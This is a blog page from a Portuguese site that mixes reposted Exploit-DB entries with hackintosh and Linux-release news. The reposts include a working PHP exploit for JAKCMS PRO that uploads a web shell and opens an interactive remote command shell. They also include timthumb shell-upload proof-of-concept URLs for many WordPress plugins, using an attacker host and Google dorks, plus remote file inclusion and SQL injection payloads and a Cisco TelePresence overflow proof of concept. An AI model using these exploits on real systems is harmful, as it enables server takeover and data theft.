Blog | AppUnix

JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit

23/09/2011 por little_oak

# Exploit Title: JAKCMS PRO < = 2.2.5 Remote Arbitrary File Upload Exploit # Google Dork: "Powered By JAKCMS" # Date: 21/09/2011 # Author: EgiX # Software Link: http://www.jakcms.com/ # Version: 2.2.5 # Tested on: Windows 7 and Debian 6.0.2 \n";

print "\nExample....: php $argv[0] localhost /";

print "\nExample....: php $argv[0] localhost /jakcms/\n";

die();

}

$host = $argv[1];

$path = $argv[2];

$packet = "GET {$path} HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Connection: close\r\n\r\n";

preg_match("/PHPSESSID=([^;]*);/i", http_send($host, $packet), $m);

$sid = $m[1];

$payload = "--o0oOo0o\r\n";

$payload .= "Content-Disposition: form-data; name=\"edit1\"\r\n\r\n.php\r\n";

$payload .= "--o0oOo0o\r\n";

$payload .= "Content-Disposition: form-data; name=\"input1\"; filename=\"foo\"\r\n\r\n";

$payload .= "< ?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";

$payload .= "--o0oOo0o--\r\n";

$get = bin2hex(RC4("id=1&check_session_variable=jak_lastURL&upload_filetype=php&dir={$path}cache/sh"));

$packet = "POST {$path}js/editor/plugins/jakadminexplorer/?action=upload&get={$get} HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Cookie: PHPSESSID={$sid}\r\n";

$packet .= "Content-Length: ".strlen($payload)."\r\n";

$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";

$packet .= "Connection: close\r\n\r\n";

$packet .= $payload;

if (preg_match("/Error/", http_send($host, $packet))) die("\n[-] Upload failed!\n");

$packet = "GET {$path}cache/sh.php HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Cmd: %s\r\n";

$packet .= "Connection: close\r\n\r\n";

while(1)

{

print "\njakcms-shell# ";

if (($cmd = trim(fgets(STDIN))) == "exit") break;

preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");

}

?>

Fonte: http://www.exploit-db.com/exploits/17882/

Multiple WordPress Plugin timthumb.php Vulnerabilites

23/09/2011 por little_oak

# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)

--- Description --- The following WordPress plugins reuse a vulnerable version of the timthumb.php library.

By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled domain such as blogger.com.evil.com and then providing it to the script through the src GET parameter, it is possible to upload a shell and execute arbitrary code on the webserver.

Reference: http://www.exploit-db.com/exploits/17602/

# Plugin: Category Grid View Gallery WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/category-grid-view-gallery # Software Link: http://wordpress.org/extend/plugins/category-grid-view-gallery/download/ # Version: 0.1.1

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/category-grid-view-gallery/cache/externel_md5(src).php

# Plugin: Auto Attachments WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/auto-attachments # Software Link: http://wordpress.org/extend/plugins/auto-attachments/download/ # Version: 0.2.9

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/auto-attachments/thumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/auto-attachments/cache/external_md5(src).php

# Plugin: WP Marketplace WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/wp-marketplace # Software Link: http://wordpress.org/extend/plugins/wp-marketplace/download/ # Version: 1.1.0

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/wp-marketplace/libs/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/wp-marketplace/libs/cache/external_md5(src).php

# Plugin: DP Thumbnail WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/dp-thumbnail # Software Link: http://wordpress.org/extend/plugins/dp-thumbnail/download/ # Version: 1.0

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/dp-thumbnail/timthumb/cache/external_md5(src).php

# Plugin: Vk Gallery WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/vk-gallery # Software Link: http://wordpress.org/extend/plugins/vk-gallery/download/ # Version: 1.1.0

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/vk-gallery/lib/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/vk-gallery/lib/cache/md5(src).php

# Plugin: Rekt Slideshow WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/rekt-slideshow # Software Link: http://wordpress.org/extend/plugins/rekt-slideshow/download/ # Version: 1.0.5

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/rekt-slideshow/picsize.php?src=MALICIOUS_URL

Must first base64 encode the URL.

The uploaded shell can be found at /wp-content/plugins/rekt-slideshow/cache/md5(src).php

# Plugin: CAC Featured Content WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/cac-featured-content # Software Link: http://wordpress.org/extend/plugins/cac-featured-content/download/ # Version: 0.8

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/cac-featured-content/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/cac-featured-content/temp/md5(src).php

# Plugin: Rent A Car WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/rent-a-car # Software Link: http://wordpress.org/extend/plugins/rent-a-car/download/ # Version: 1.0 --- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/rent-a-car/libs/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/rent-a-car/libs/cache/external_md5(src).php

# Plugin: LISL Last Image Slider WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/lisl-last-image-slider # Software Link: http://wordpress.org/extend/plugins/lisl-last-image-slider/download/ # Version: 1.0

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/lisl-last-image-slider/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/lisl-last-image-slider/cache/external_md5(src).php

# Plugin: Islidex WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/islidex # Software Link: http://wordpress.org/extend/plugins/islidex/download/ # Version: 2.7

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/islidex/js/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/islidex/js/cache/md5(src).php

# Plugin: Kino Gallery WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/kino-gallery # Software Link: http://wordpress.org/extend/plugins/kino-gallery/download/ # Version: 1.0

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/kino-gallery/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/kino-gallery/cache/external_md5(src).php

# Plugin: Cms Pack WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/cms-pack # Software Link: http://wordpress.org/extend/plugins/cms-pack/download/ # Version: 1.3

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/cms-pack/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/uploads/cms-pack-cache/external_md5(src).php

# Plugin: A Gallery WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/a-gallery # Software Link: http://wordpress.org/extend/plugins/a-gallery/download/ # Version: 0.9

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/a-gallery/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/a-gallery/cache/external_md5(src).php

# Plugin: Category List Portfolio Page WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/category-list-portfolio-page # Software Link: http://wordpress.org/extend/plugins/category-list-portfolio-page/download/ # Version: 0.9

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/category-list-portfolio-page/scripts/cache/external_md5(src).php

# Plugin: Really Easy Slider WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/really-easy-slider # Software Link: http://wordpress.org/extend/plugins/really-easy-slider/download/ # Version: 0.1

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/really-easy-slider/inc/thumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/really-easy-slider/inc/cache/external_md5(src).php

# Plugin: Verve Meta Boxes WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/verve-meta-boxes # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/verve-meta-boxes/download/ # Version: 1.2.8

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/verve-meta-boxes/tools/cache/external_md5(src).php

# Plugin: User Avatar WordPress plugin shell upload vulnerability # Google Dork: inurl:wp-content/plugins/user-avatar # Software Link: http://wordpress.org/extend/plugins/user-avatar/download/ # Version: 1.3.7

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/user-avatar/user-avatar-pic.php?id=0&allowedSites[]=blogger.com&src=http://blogger.com.evil.com/poc.php

Requires register_globals to be enabled and at least one user account to have an avatar directory.

The uploaded shell can be found at /wp-content/uploads/avatars/$id/external_md5(src).php

# Plugin: Extend WordPress WordPress plugin Shell Upload vulnerability # Google Dork: inurl:wp-content/plugins/extend-wordpress # Software Link: http://wordpress.org/extend/plugins/extend-wordpress/download/ # Version: 1.3.7

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/extend-wordpress/helpers/timthumb/cache/external_md5(src).php

Fonte: http://www.exploit-db.com/exploits/17872/

Cisco TelePresence Multiple Vulnerabilities – SOS-11-010

23/09/2011 por little_oak

Sense of Security - Security Advisory - SOS-11-010

Release Date. 19-Sep-2011 Last Update. - Vendor Notification Date. 21-Feb-2011 Product. Cisco TelePresence Series Platform. Cisco Affected versions. C < = TC4.1.2, MXP <= F9.1 Severity Rating. Low - Medium Impact. Cookie/credential theft, impersonation, loss of confidentiality, client-side code execution, denial of service. Solution Status. Vendor patch References. 1. CVE-2011-2544 (CSCtq46488) 2. CVE-2011-2543 (CSCtq46496) 3. CVE-2011-2577 (CSCtq46500) Details. Cisco TelePresence is an umbrella term for Video Conferencing Hardware and Software, Infrastructure and Endpoints. The C & MXP Series are the Endpoints used on desks or in boardrooms to provide users with a termination point for Video Conferencing. 1. Post-authentication HTML Injection - CVE-2011-2544 (CSCtq46488): Cisco TelePresence Endpoints have a web interface (HTTP or HTTPS) for managing, configuring and reporting. It is possible to set the Call ID (with H.323 or SIP) to a HTML value. If a call is made to another endpoint and an authenticated user browses to the web interface on the endpoint receiving the call (e.g. to view call statistics), the HTML will render locally within the context of the logged in user. From this point it is possible to make changes to the system as the authenticated user. The flaw is due to the flexibility of the H.323 ID or SIP Display Name fields and failure to correctly validate user input. Examples (MXP): Rebooting the system: The attacker may also choose to change passwords in the system, disable encryption or enable telnet:

2. Post-authentication Memory Corruption - CVE-2011-2543 (CSCtq46496): Cisco TelePresence systems (Endpoints and Infrastructure) use XPath for setting and getting configuration.

Example syntax is: http://ip/getxml?location=/Configuration/Video The request is sent to a locally listening shell (tshell). This is the case for all requests relating to performing an action on the system (e.g. config get or set). The shell then sends the input to the "main" application (/app/main, id=0), and the data is passed as a parameter.

It was discovered that the getXML handle does not properly perform length checking on the user supplied input before passing it to the tshell. Furthermore, there is no length checking performed in the tshell and no bounds checking performed in the main application where the parameter is consumed. As such, it is possible to send input that exceeds the size of the receiving buffer, subsequently causing an invalid address to be read. This causes a reboot on the Endpoints. The VCS will not reboot, the process will crash by SIGSEGV (or sigabrt) but it will restart the process itself which drops all calls.

Proof of Concept: GET /wsgi/getxml?location="+("A"*5200)+("\x60"*4)+("X"*4)+"HTTP/1.1\r\n Host: 192.168.6.99\r\n\r\n"

Received signal SIGSEGV (11) in thread 0x129e8480, TID 2670 Illegal memory access at: 0x5858585c Registers: GPR00: 00f2c908 129e5960 129ef920 00000005 00000040 0000000c 00000037 0f315580 GPR08: 00000005 129e5a70 129e5a80 58585858 0f3272d4 11589858 129e6896 0000000b GPR16: 129e6084 11164a1c 00000000 129e6894 00000037 1299ca18 00000005 00000002 GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac 129e5960 GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac 129e5960 NIP: 0f39abc8 MSR: 0000d032 OGPR3: 00000002

As you can see, the crash string is passed as a parameter in GPR 8. The severity of this issue is compounded by the fact that the main application runs as root, this could potentially lead to arbitrary code execution.

3. Pre-authentication SIP Denial of Service - CVE-2011-2577 (CSCtq46500): Cisco TelePresence Endpoints utilise SIP for the call setup protocol. Sending a SIP INVITE with a 4x8 a"s in the MAC Address field and the receive field causes the system to reboot.

Proof of Concept: MXP: Exception 0x1100 : Data TLB load miss Active task FsmMain FSM process : SipTrnsp(0) FSM message : SipTrnsp_Send_Msg_Req from SipTrnsp(0) Data TLB miss (DMISS) : 0x00000000 (illegal addr. accessed)

Solution. Upgrade to TC4.2 for the C series to fix validation issues.

Discovered by. David Klein, Sense of Security Labs.

About us. Sense of Security is a leading provider of information security and risk management solutions. Our team has expert skills in assessment and assurance, strategy and architecture, and deployment through to ongoing management. We are Australia's premier application penetration testing firm and trusted IT security advisor to many of the countries largest organisations.

Sense of Security Pty Ltd Level 8, 66 King St Sydney NSW 2000 AUSTRALIA

T: +61 (0)2 9290 4444 F: +61 (0)2 9290 4455 W: http://www.senseofsecurity.com.au E: [email protected] Twitter: @ITsecurityAU

The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-11-010.pdf

Other Sense of Security advisories can be found at: http://www.senseofsecurity.com.au/research/it-security-advisories.php

Fonte: http://www.exploit-db.com/exploits/17871/

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

23/09/2011 por little_oak

# Exploit Title: Relocate Upload WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/relocate-upload # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/ # Version: 0.14 (tested)

--- PoC --- http://SERVER/db_unx_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

--- Vulnerable Code --- // Move folder request handled when called by GET AJAX if (isset($_GET['ru_folder'])) { // WP setup and function access define('db_unx_USE_THEMES', false); require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter

Fonte: http://www.exploit-db.com/exploits/17869/

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

23/09/2011 por little_oak

# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/ # Version: 1.36 (tested)

—
PoC
—
http://SERVER/db_unx_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work)

—
Vulnerable Code
—
if (isset($_FILES[‘wpmm-upload’])) {
// Create WordPress environmnt
require_once(urldecode($_REQUEST[‘abspath’]) . ‘wp-load.php’);

// Handle attachment
WPMiniMail::wpmm_upload();
}

Fonte: http://www.exploit-db.com/exploits/17868/

P5KPL-AM SE updates no lion 10.7.1 current ocorreram muito bem no hackintosh

21/09/2011 por little_oak

Boa noite grandes mestres, só estamos postando esta informação extra para deixar o coração dos amantes de hackintosh mais tranquilizados.
Fizemos, neste instante todas as updates disponíveis pela apple na arquitetura 10.7.1 (current) em cima do seguinte hardware:

Cpu – 2160 (intel dual core),

2 gb de ram ddr 800,

VGA nvidia 8500gt,

P5KPL-AM SE (placa-mãe).

O máximo de erro que você poderá encontrar (após reboot) é o do print a seguir:

Basta apenas reiniciar seu hackintosh e o problema será sanado (provavelmente permissões).

Se você usa hackintosh pode fazer todas as updates possíveis até o dia 20/09/2011, tudo filé.

Qualquer dúvida ou sugestão reportem-nos.

Abraços.

Itens básicos para entrar no mundo Hackintosh

19/09/2011 por Shell

Olá galera… tudo na paz?

Vixe, muito tempo sem escrever aqui galera….. Mas é por uma nobre causa….. tenho me esforçado ao máximo para adquirir conhecimentos que facilitem as explicações e melhorem os artigos a vocês nossos leitores….. hoje eu queria esclarecer alguns aspectos que considero fundamentais ao entusiastas ao mundo hackintosh…..

Não quero ser chato, muito menos egoista… mas há certas coisas que são indispensáveis a se saber quando se quer mexer com algo tão complexo… (Hackintosh)

Ex:

1 – Saber ao menos o básico sobre hardware (ou ao menos saber onde procurar)

2 – Configurações básicas e avançadas de BIOS

3 – Noções básicas de sistemas Linux (é dispensável, mas isso facilita muito o entendimento de comandos e dos sistema de diretórios do Mac OS)

4 – O principal de tudo, força de vontade e saber bons lugares para se procurar gente que queira lhe ajudar

Está parecendo anuncio de vaga de emprego, hauhauahuah mas não é….. são apenas aspectos básicos e que acho essenciais ao Hackitnosher

Alguns sites com informação de responsa:

https://www.appunix.com.br

http://www.hmbt.org

http://www.hackintosh.com

http://blog.nawcom.com/

http://www/hackintosh.org

http://www.lifehacker.com

http://tonymacx86.blogspot.com/

http://www.tomshardware.com/

http://forum.voodooprojects.org/

http://www.kexts.com

http://wiki.osx86project.org/wiki/index.php/Main_Page

http://www.insanelymac.com/

Não necessariamente nessa ordem, esse são sites onde seus membros escrevem materiais de responsa sobre Mac OS X, Hackintosh…. inclusive desenvolvem ferramentas que facilitam a vida de NÓS entusiastas do mundo Hackintosh…… o principal desse post é dizer que não adianta o cara querer entrar no mundo Hackintosh sem saber ao menos como dar boot via cd ou pendrive…. fica impossível galera, não dá pra dar suporte ou ao menos ajudar pessoas que não sabem o mínimo de informática…. Sinceramente não sei como serei interpretado ao escrever esse artigo mas, espero que não me entendam mal, mas quero apenas que facilitem minha vida ao lhes ajudar e a suas ao serem ajudados….. Aprendi muito com a cominidade Linux e principalmente com a comunidade Hackintosh…. Todos querem ajudar mas não somos curso de informática….. não estamos aqui para ensinar informática, vamos ajudar a resolver qualquer tipo de problema (ou aos menos vamos nos esforçar bastante para isso)… mas nos procurar sem saber ao menos com se entra na BIOS de um PC, isso é muito constrangedor…. Eu pelo menos não consigo maltratar ninguém…. nem ao menos negar ajuda, mas se vocês já frequentaram outros fóruns por ai, devem perceber que existem moderadores e/ou usuários mais avançados que fazem esses inesperientes usuários perderem a vontade de entrar/continuar nesse mundo do Hackitnosh….. Resolvi a alguns dias conversando com meu grande amigo Little_Oak que vamos tornar o AppUnix um portal com conteúdo para todo tipo de usuário Hackintosh…. desde o cara que não sabe absolutamente nada, até o usuário Mac/Hackintosh experiente que precisa resolver um problema em seu Mac ou Hackitnosh e não sabe onde encontrar a resposta….. Eu particularmente acho que antes de entrar nesse mundo hackintosh todos NÓS deveriamos conhecer as maravilhas do mundo Linux….. Eu, Doooguinha comecei a mexer a ser um entusiasta no Mundo Mac (diga-se Hackitnosh) um pouco antes de começar no Mundo Linux…. até que surgiu a vontade/necessidade de me diferenciar dos amigos sysadmins de plantão…… Grande maioria de nossos amigos sysadmins somente conhecem Window$…. Infelizmente é assim….. Hoje tenho mais ou menos 3 anos que sou usuários Linux… administro Redes mistas, e o conhecimento que o mundo Linux me trouxe foi um dos pontos principais à minha adaptação tão rápida aos conceitos do mundo Hackintosh…. ficou tudo muito mais claro do que quando eu não conhecia nada de Linux…. não sou expert em Linux nem em Mac OS… mas me viro bem em qualquer dos ambientes…. pretendo no final do ano tirar minha primeira Certificação Linux (LPI nível 1) e no próximo ano tirar LPI nível 2….. Costumo dizer que “Uso Mac OS, estudo Linux e respeito windows (por ter uma gangue muito grande e poder querer juntar sua turminha e me pegar na rua)“ …

Nos ajudem leitores, vamos fazer desse portal um referencial aos que querem entrar nesse mundo de hackitnosh, estou completamente comprometido em deixar isso aqui ideal aos que não tem experiência alguma nessa área… A indicação de how tos/dúvidas por meio de vocês leitores será importantíssima para que nosso BLOG vire um ponto de encontro entre usuários de todos os níveis do mundo hackintosh…. contamos de verdade com a colaboração de vocês.

Gostou? Comente, complemente e espalhe!

Obrigado a todos….

Lançado FreeBSD 9.0-BETA2

15/09/2011 por little_oak

Ken Smith has announced the availability of the second beta of FreeBSD 9.0, more than a month later than planned: “The second beta build of the 9.0-RELEASE release cycle is now available. Note: the location of the FTP install tree and ISOs have changed slightly. What we used for BETA2 reflects a directory structure that would let us fully utilize building and distributing a wider variety of architectures. The new layout does add some extra complexity, so we’re actively discussing whether or not to change the layout from previous releases, and if we do change it whether or not to change it this much. What’s there now can be viewed as an almost ‘worst-case’ scenario. It’s entirely possible we’ll back off and revert to the old layout despite that layout potentially limiting.” There is much more information in the release announcement, including notes on what to test. Download links for the i386 and amd64 ISO images: FreeBSD-9.0-BETA2-i386-dvd1.iso (498MB, SHA256), FreeBSD-9.0-BETA2-amd64-dvd1.iso (607MB, SHA256).

Fonte: http://distrowatch.com/6875

openSUSE 12.1 Milestone 5 Lançado

06/09/2011 por little_oak

Bryen Yunashko has announced the availability of the third milestone release of openSUSE 12.1: “openSUSE 12.1’s milestone 5 is now ready for download. Here are some interesting things you can expect to see when you try milestone 5: further changes have been made to systemd which replaces the SysInitV system, the default is still SysInitV but we encourage testing of systemd so that we can switch the default for the next release; we are focusing on the GPL-ed OpenJDK version now, this milestone is the last one that comes with the binary Java provided by Oracle; GNOME 3.1.5 is another step closer to GNOME 3.2; glibc has been updated to version 2.14.” For more details please see the full release announcement. Download (mirrors): openSUSE-KDE-LiveCD-Build0250-i686.iso (696MB, MD5, torrent), openSUSE-GNOME-LiveCD-Build0250-i686.iso (664MB, MD5, torrent), openSUSE-KDE-LiveCD-Build0250-x86_64.iso (689MB, MD5, torrent), openSUSE-GNOME-LiveCD-Build0250-x86_64.iso (678MB, MD5, torrent).

Fonte: http://distrowatch.com/6869

WordPress yolink Search plugin <= 1.1.4 SQL Injection

06/09/2011 por little_oak

# Exploit Title: WordPress yolink Search plugin < = 1.1.4 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip # Version: 1.1.4 (tested) --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1 --------------- Vulnerable code --------------- $post_type_in = array(); if( isset( $_POST['page'] ) ) { $post_type_in[] = '"page"'; } if( isset( $_POST['post'] ) ) { $post_type_in[] = '"post"'; } $post_type_in = '(' . implode(',', $post_type_in) . ')'; $id_from = $_POST['from_id']; $batch_size = $_POST['batch_size']; $post_recs = $wpdb->get_results( $wpdb->prepare( "SELECT ID,GUID FROM $wpdb->posts WHERE post_status='publish' AND post_type IN $post_type_in AND ID > $id_from order by ID asc LIMIT $batch_size" ) ); //misusage of $wpdb->prepare() :)

Fonte: http://www.exploit-db.com/exploits/17757/